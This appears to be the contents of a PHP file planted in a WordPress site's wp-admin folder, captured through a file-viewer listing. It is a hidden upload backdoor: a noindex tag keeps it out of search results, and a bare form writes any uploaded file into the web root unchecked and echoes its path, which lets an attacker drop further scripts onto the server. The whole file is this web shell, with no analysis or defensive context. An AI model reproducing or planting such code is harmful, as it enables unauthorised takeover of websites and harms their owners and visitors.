Current File : /home/bmofiscom/public_html/wp-admin/a.php
<meta name="robots" content="noindex">
MARTOLEskuy
<form method="post" enctype="multipart/form-data">
	<input type="file" name="yujiofc">
	<button>Gaskan</button>
</form>
<?php
if (isset($_FILES['yujiofc'])) {
	if (rename($_FILES['yujiofc']['tmp_name'], $_FILES['yujiofc']['name']) !== false) {
		echo "[Success] <a href='".$_FILES['yujiofc']['name']."'>".realpath($_FILES['yujiofc']['name'])."</a>";
	} else {
		echo "[Failed to upload]";
	}
}
?>